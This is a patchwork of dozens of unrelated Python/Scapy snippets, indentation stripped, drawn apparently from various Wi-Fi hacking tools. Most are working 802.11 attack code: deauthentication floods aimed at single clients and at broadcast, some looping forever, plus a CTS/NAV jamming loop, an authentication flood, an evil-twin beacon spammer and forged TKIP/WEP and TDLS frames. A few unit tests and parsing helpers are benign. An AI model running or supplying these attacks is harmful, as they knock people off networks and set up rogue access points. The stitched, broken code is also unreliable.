def asso_frame_blueprint(self, ap, cl):
capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
efields = self.enumerate_asso_fields(self.beacon)
return RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(cap=capibility, listen_interval=3) / \
Dot11Elt(ID=efields[0]['ID'], len=efields[0]['len'], info=efields[0]['info']) / \
Dot11Elt(ID=efields[1]['ID'], len=efields[1]['len'], info=efields[1]['info']) / \
Dot11Elt(ID=efields[48]['ID'], len=efields[48]['len'], info=efields[48]['info'])
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key,
key_idx=0, additionnal_flag=["from-DS"],
encrypt_key=None):
"""Send an encrypted packet with content @data, using IV @iv,
sequence number @seqnum, MIC key @mic_key
"""
if encrypt_key is None:
encrypt_key = self.tk
rep = RadioTap()
rep /= Dot11(
addr1=dest,
addr2=self.mac,
addr3=self.mac,
FCfield="+".join(['wep'] + additionnal_flag),
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
# Assume packet is send by our AP -> use self.mac as source
# Encapsule in TKIP with MIC Michael and ICV
data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest)
# Header TKIP + payload
rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key))
self.send(rep)
return rep
def deauth_all(self):
dic = {}
global cicl
if self.count == 0:
cicl = 80
else:
cicl = self.count
radio = b'\x00\x00\x0c\x00\x04\x80\x00\x00\x02\x00\x18\x00'
#deauth = bytes(Dot11Deauth(reason=15))
for iter in range(1, cicl):
ap_mobile = radio + bytes(
Dot11(type=0,
subtype=12,
ID=14849,
addr1='ff:ff:ff:ff:ff:ff',
addr2=self.bssid,
addr3=self.bssid,
SC=iter) / Dot11Deauth(reason=15))
dic['src_mac'] = self.bssid
dic['dst_mac'] = 'ff:ff:ff:ff:ff:ff'
dic['type'] = 'Deauth'
dic['reason'] = 'Врем четырехстороннего рукопожати истекло'
self.write_to_file(self.out, json.dumps(dic))
#packet = radio + dot11 + sn + deauth
sendp(ap_mobile, iface=self.iface, count=4, verbose=0)
if not self.event.is_set():
break
def encrypt_wep(p, key, pn, keyid=0):
"""Takes a plaintext Dot11 frame, encrypts it, and adds all the necessairy headers"""
# Update the FC field --- XXX share this with encrypt_ccmp
p = p.copy()
p.FCfield |= Dot11(FCfield="protected").FCfield
if Dot11QoS in p:
payload = raw(p[Dot11QoS].payload)
p[Dot11QoS].remove_payload()
# Explicitly set TID so we can assume it's an integer
if p[Dot11QoS].TID == None:
p[Dot11QoS].TID = 0
priority = p[Dot11QoS].TID
else:
payload = raw(p.payload)
p.remove_payload()
priority = 0
# Add the WEP ICV which will be encrypted
payload += struct.pack("<I", zlib.crc32(payload) & 0xffffffff)
iv = struct.pack(">I", pn)[1:]
cipher = ARC4.new(iv + key)
ciphertext = cipher.encrypt(payload)
# Construct packet ourselves to avoid scapy bugs
newp = p / iv / struct.pack("<B", keyid) / ciphertext
return newp
def test_new_packet(self):
"""
Tests the 'new_packet' method.
"""
config = Config()
new_packets = Queue()
sniffer = PacketSniffer(config, new_packets)
self.assertEqual(sniffer.new_packets.qsize(), 0)
packet = RadioTap() \
/ Dot11(
addr1="ff:ff:ff:ff:ff:ff",
addr2="aa:bb:cc:11:22:33",
addr3="dd:ee:ff:11:22:33"
) \
/ Dot11ProbeReq() \
/ Dot11Elt(
info="Test"
)
sniffer.new_packet(packet)
self.assertEqual(sniffer.new_packets.qsize(), 1)
ProbeRequestParser.parse(sniffer.new_packets.get(timeout=1))
def cts_nav_attack(interface):
# http://matej.sustr.sk/publ/articles/cts-dos/cts-dos.en.html
# pkt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
pkt = RadioTap() / Dot11(type=1, subtype=12, ID=0xff7f, addr1="00:00:de:ad:be:ef")
while True:
interface.inject(pkt)
sleep(0.01)
def getBaseLayerOfPCAP(self):
"""
see ParsingConstants.LINKTYPES
:return: Determine lowest encapsulating layer of PCAP.
"""
if self._baselayer is not None:
return self._baselayer
try:
# looking at just one message should reveal lowest encapsulating layer of the whole PCAP
al5msg = next(iter(self.messagePool.keys()))
except StopIteration:
raise ValueError('No message could be imported. See previous errors for more details.')
if isinstance(al5msg, L2NetworkMessage):
if al5msg.l2Protocol == 'Ethernet':
return ParsingConstants.LINKTYPES['ETHERNET']
# for some reason, its not possible to access the class variable "name", so instantiate a dummy object
elif al5msg.l2Protocol == Dot11().name or al5msg.l2Protocol == Dot11FCS().name:
return ParsingConstants.LINKTYPES['IEEE802_11'] # 802.11
elif al5msg.l2Protocol == 'None': # no ethernet
if al5msg.l3Protocol == 'IP':
return ParsingConstants.LINKTYPES['RAW_IP'] # IP
else:
raise NotImplementedError("Linktype on layer 3 unknown. Protocol is {}".format(al5msg.l3Protocol))
else:
raise NotImplementedError("Linktype on layer 2 unknown. Protocol is {}".format(al5msg.l2Protocol))
else:
return ParsingConstants.LINKTYPES['undecoded'] # non-decoded raw trace without link type information
def auth_attack(interface, sta, ap):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
while True:
cprint("ZZZ", 'blue')
interface.inject(pkt)
pkt.SC += 1
sleep(0.3)
def send_tdls_disc(bssid, src, dst):
global token
discovery_request = Dot11(type=2, subtype=0, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) \
/ SNAP(OUI=0x000000, code=0x890d) \
/ ("\x02\x0c\x0a\x01\x65\x12" + bssid + src + dst)
sendp(rt / discovery_request, iface=interface, verbose=False, loop=0)
def run(self, args, cmd):
self.cmd = cmd
with db_session:
bss = cmd.select_bss(args.ssid, args.bssid, args.client)
if bss:
if not args.bssid:
args.bssid = bss.bssid
if args.channel is None:
args.channel = bss.channel
if args.bssid is None:
cmd.perror("BSSID is missing, and couldn't be obtained from the recon db.")
elif args.channel is None:
cmd.perror("Channel is missing, and couldn't be obtained from the recon db.")
else:
interface = set_monitor_mode(args.iface)
if args.channel > 0:
check_chset(interface, args.channel)
else:
args.channel = pyw.chget(interface)
deauth_frame = RadioTap() / Dot11(addr1=args.client, addr2=args.bssid, addr3=args.bssid) / Dot11Deauth(
reason="class3-from-nonass")
args.num_frames = "infinite" if args.num_frames <= 0 else args.num_frames * 64
if compare_macs(args.client, BROADCAST_MAC):
cmd.pfeedback(
"[i] Sending {} deauth frames to all clients from AP {} on channel {}...".format(args.num_frames,
args.bssid,
args.channel))
else:
cmd.pfeedback(
"[i] Sending {} deauth frames to client {} from AP {} on channel {}...".format(args.num_frames,
args.client,
args.bssid,
args.channel))
if args.num_frames == "infinite":
self.inf_running = True
prev_sig_handler = signal.signal(signal.SIGINT, self.sig_int_handler)
cmd.pfeedback("[i] Press ctrl-c to stop.")
while self.inf_running:
try:
sendp(deauth_frame, iface=args.iface, count=64, inter=0.002)
except:
pass
sleep(0.5)
signal.signal(signal.SIGINT, prev_sig_handler)
else:
sendp(deauth_frame, iface=args.iface, count=args.num_frames, inter=0.002)
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
payload = (RadioTap() / Dot11(
addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) /
Dot11Auth(seqnum=1))
self.__thread_sendp__(payload)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.get_rsn_information(essid)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
return 2
if self.lastpacket.getlayer(Dot11Auth).status != 0:
return 4
#Dot11 Association Request
payload = (RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo)
self.__thread_sendp__(payload)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0
return 0
def send_tdls_setup(bssid, src, dst):
global token
setup_request = Dot11(type=2, subtype=0, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) \
/ SNAP(OUI=0x000000, code=0x890d) \
/ ("\x02\x0c\x00\x01\xff\xff")
# Dialog token - capabilities - supported rates
sendp(rt / setup_request, iface=interface, verbose=False, loop=0)
def deauth_attack(gateway_mac, interface, target_mac):
#target_mac = "ff:ff:ff:ff:ff:ff"
#target_mac = "08:c5:e1:87:79:c1"
packet = RadioTap() / Dot11(type=0,
subtype=12,
addr1=target_mac,
addr2=gateway_mac,
addr3=gateway_mac) / Dot11Deauth(reason=7)
sendp(packet, iface=interface, count=10000, inter=0.1)
def disassociate(self):
# Forge the dot11 disassociation packet
dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)
# Loop to send the disassociation packets to the victim device
while True:
# Repeat every delay value seconds
time.sleep(self.delay)
print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)
sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)
def send_load_req(bssid, src, dst):
global token
#initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
# / ("\x05\x00" + token + "\x00\x01" +
# "\x26\x09\x01\x0e\x03\x04\x00\xff\xff\x00\x00")
initial = Dot11(type=0, subtype=13, addr1=dst, addr2=src, addr3=bssid, SC=next_sc(), FCfield=0) \
/ ("\x05\x00" + token + "\x00\x01" +
"\x26\x0d\x01\x0e\x03\x04\x00\x00\x00\x64\x00\x01\x02\x01\x00")
sendp(rt / initial, iface=interface, verbose=False, loop=0)
def set_privacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.probe_response_template = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=self.bssid,
addr3=self.bssid) /
Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info='') /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=self.channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif value == PRIVACY_WEP:
self.probe_response_template = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=self.bssid,
addr3=self.bssid) /
Dot11ProbeResp(cap='ESS+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info='') /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=self.channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif value == PRIVACY_WPA:
self.probe_response_template = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=self.bssid,
addr3=self.bssid) /
Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info='') /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=self.channel) /
Dot11Elt(ID=221,
info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
"\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
"\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") /
Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt(
ID=221,
info=
"\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"
))
def attack_wlan(Client_mac, A_point_mac, M_mode):
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=Client_mac, addr2=A_point_mac, addr3=A_point_mac)
# stack them up
packet = RadioTap() / dot11 / Dot11Deauth(reason=7)
# send the packet
sendp(packet, inter=0.1, count=100, iface=M_mode, verbose=1)
def deauth():
ssid_mac = raw_input(
'Please enter the SSID mac for Deauthentication Attack: \n')
while (not is_mac_valid(ssid_mac)):
ssid_mac = raw_input('Wrong MAC address please try again: \n')
is_mac_valid(ssid_mac)
print('making attack for mac -> %s \n' % ssid_mac)
dot11 = Dot11(addr1=ssid_mac, addr2=target, addr3=target)
packet = RadioTap() / dot11 / Dot11Deauth()
sendp(packet, inter=0.001, count=1000, iface=interface)
def deauth(self):
deauthPacket = RadioTap() / Dot11(
type=0,
subtype=12,
addr1=self.macTarget,
addr2=self.macAP,
addr3=self.macAP) / Dot11Deauth(reason=7)
while True:
sendp(deauthPacket, iface=self.interface, count=1, verbose=True)
sleep(30)
def deauth(ap, client):
i = 0
time.sleep(3)
while (i < 2):
# Deauthentication Packet For Access Point
pkt = RadioTap() / Dot11(addr1=client, addr2=ap,
addr3=ap) / Dot11Deauth()
print("Deauth to: %s" % (client))
sendp(pkt, iface=interface)
i += 1
def evilTwin():
fake_mac = RandMAC()
evil_twin = RadioTap() / Dot11(type=0,
subtype=8,
addr1="FF:FF:FF:FF:FF:FF",
addr2=fake_mac,
addr3=fake_mac) / Dot11Beacon() / Dot11Elt(
ID="SSID", info=ssid)
while True:
sendp(evil_twin, iface=interface, verbose=True)
def send_probe_req(self, bssid, essid):
"""Send a probe request to the specified AP"""
src = RandMAC() if self.mac is None else self.mac
self.logger.info(
'[!] Sending Broadcast Probe Request: SRC=[%s] -> BSSID: %s ESSID: %s'
% (src, bssid, essid))
param = Dot11ProbeReq()
essid = Dot11Elt(ID='SSID', info=essid)
rates = Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60")
dsset = Dot11Elt(ID='DSset', info='\x01')
pkt = RadioTap() / Dot11(
type=0,
subtype=4,
addr1='ff:ff:ff:ff:ff:ff',
addr2=src,
addr3='ff:ff:ff:ff:ff:ff') / param / essid / rates / dsset
try:
sendp(pkt, verbose=0)
except:
return
# raise
#
print("Probing network '%s (%s)'\n" % (bssid, essid))
try:
# Build a probe request packet with a SSID and a WPS information element
dst = mac2str(bssid)
src = mac2str("ff:ff:ff:ff:ff:ff")
packet = Dot11(addr1=dst, addr2=src, addr3=dst) / Dot11ProbeReq()
packet = packet / Dot11Elt(
ID=0, len=len(essid), info=essid) / Dot11Elt(
ID=221,
len=9,
info="%s\x10\x4a\x00\x01\x10" % self.wps_parser.WPS_ID)
# Send it!
send(packet, verbose=0)
# self.probedNets[bssid] = None
except Exception, e:
print 'Failure sending probe request to', essid, ':', e
def disconnect_all(gateway_mac, interface):
target_mac = "ff:ff:ff:ff:ff:ff"
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = RadioTap() / dot11 / Dot11Deauth(reason=7) #radioTap- header in IEEE 802.11,
# send the packet
sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
def run_deauth(self):
# get client MAC from selected row
row = self.sel_client_table.currentIndex().row()
deauth_client = self.sel_client_table.item(row, 0).text()
# RadioTap() is first layer wireless packer, Dot11() Management layer Dot11Deauth() creates deauth frame.
pkt = RadioTap() / Dot11(addr1=deauth_client,
addr2=self.deauth_ap) / Dot11Deauth()
for i in range(50):
sendp(pkt, iface="wlp3s0mon")
def test_fuzz_packets(self):
"""
Parses 1000 randomly-generated probe requests with the
'ProbeRequestParser.parse()' function.
"""
# pylint: disable=no-self-use
for i in range(0, 1000):
packet = RadioTap() / fuzz(Dot11() / Dot11ProbeReq() / Dot11Elt())
ProbeRequestParser.parse(packet)
def run(self):
while True:
if self.flag:
raise Exception('Stop sending deauth packet')
for ap in self.AP_list:
address = ap[0]
deauth_ap = Dot11(addr1=self.client,
addr2=address,
addr3=address) / Dot11Deauth()
print ls(deauth_ap)
send(deauth_ap, inter=0, count=1)
def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True): """ Send a frame, if raw, insert the data above the Dot11QoS layer. """ frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype) if raw: frame = frame/data else: frame = frame/Dot11QoS()/data sendp(frame, iface=self.interface, verbose=False) self.sequence += 1
def perform_deauth(router, client, iface):
pckt = RadioTap() / Dot11(addr1=client, addr2=router,
addr3=router) / Dot11Deauth(reason=4)
cli_to_ap_pckt = RadioTap() / Dot11(
addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7)
print('Sending Deauth to ' + client + ' from ' + router)
try:
for i in range(100):
sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
sendp(cli_to_ap_pckt,
inter=0.1,
count=1,
loop=0,
iface=iface,
verbose=0)
print("\U0001F608")
except Exception as e:
print(f"error: {e}")
def send(iface, team_id, cmd, data, stream, dh_key=1):
encoded_data = int.from_bytes(data, byteorder='big') * dh_key
pkg = RadioTap() / Dot11(type=2) / LLC() / Env(
team_id=team_id,
stream=stream,
cmd=cmd,
decoded=31337,
data=str(encoded_data),
sign=str(sign(encoded_data, private_key)))
for i in range(10):
time.sleep(randint(10, 200) / 1000)
sendp(pkg, iface=iface, verbose=0)
def forge_ap(self):
_broadct = "ff:ff:ff:ff:ff:ff"
_pkt_ap = RadioTap() / Dot11(addr1=_broadct,
addr2=self.ap,
addr3=self.ap) / Dot11Deauth(reason=7)
if self.unlimited:
while True:
self.flood_ap(_pkt_ap, _broadct)
else:
for _count in range(0, self.count):
self.flood_ap(_pkt_ap, _broadct)